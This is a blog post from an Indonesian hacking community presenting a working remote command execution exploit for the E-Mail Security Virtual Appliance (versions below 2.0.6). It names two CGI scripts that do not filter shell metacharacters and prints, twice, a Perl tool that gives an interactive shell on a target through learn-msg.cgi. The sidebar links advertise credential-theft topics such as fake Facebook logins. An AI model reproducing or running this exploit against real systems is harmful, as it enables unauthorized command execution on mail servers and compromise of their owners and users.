E-Mail Security Virtual Appliance (ESVA) Exploit.

ijoo 16 Agustus 2012 Hacking Leave a comment 1,641 Views

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
# Date: 10 Aug 2012
# Exploit Author: iJoo
# Vendor Homepage: http://www.esvacommunity.com/
# Software Link: http://sourceforge.net/projects/esva-project/
# Version: < 2.0.6

ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.

-=+ Infected Files

…./cgi-bin/learn-msg.cgi
…./cgi-bin/release-msg.cgi

Not found any strips/filter to metacharacters..
Attacker can easily execute command..

-=+ Simple RCE ESVA

#! /usr/bin/perl
use LWP;
use HTTP::Request;
if (@ARGV < 1)
{
print "\n==========================================\n";
print "   ESVA - REMOTE EXECUTION SCRIPT \n";
print "==========================================\n";
print "Usage: perl esva.pl host (without http://)\n";
print "Ex. perl esva.pl www.korban.com\n";
exit;
}
$host=$ARGV[0];
print "Try to Execution Command!\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);
while($cmd !~ "exit")
{
$content = "";
$ua = LWP::UserAgent->new();
$ua->agent('');
$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");
$response = $ua->request ($request);
$content = $response->content;
print $content."\n";
print "iDSc-shell# ";
chomp( $cmd = <STDIN>);
}

#! /usr/bin/perl

use LWP;

use HTTP::Request;

if (@ARGV < 1)

{

print "\n==========================================\n";

print " ESVA - REMOTE EXECUTION SCRIPT \n";

print "==========================================\n";

print "Usage: perl esva.pl host (without http://)\n";

print "Ex. perl esva.pl www.korban.com\n";

exit;

}

$host=$ARGV[0];

print "Try to Execution Command!\n";

print "iDSc-shell# ";

chomp( $cmd = <STDIN>);

while($cmd !~ "exit")

{

$content = "";

$ua = LWP::UserAgent->new();

$ua->agent('');

$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");

$response = $ua->request ($request);

$content = $response->content;

print $content."\n";

print "iDSc-shell# ";

chomp( $cmd = <STDIN>);

}

-=+ Thanks to
My lovely Country NKRI INDONESIA!!
Binh4x staff – www.binushacker.net // Forum.binushacker.net

BINUS HACKER Indonesian Hacking Community

E-Mail Security Virtual Appliance (ESVA) Exploit.

About ijoo

Check Also

Hacking dan Tuning Ruby Programming

Tinggalkan Balasan Batalkan balasan

How To Get Started Crafting

Productivity Techniques for Writers

Writing On-line: Don’t Eliminate Your Persona

A Brief History on The Way The Cannabis Stigmas Started

Are You Nevertheless a Good Contributor: How To not Get Outmoded

Hacking Facebook Using Fake Login

Indonesia Hacker

Tips Melihat Password Bintang

Buka Kode Keamanan Segala Jenis HP

Portable Yahoo Hacking Tools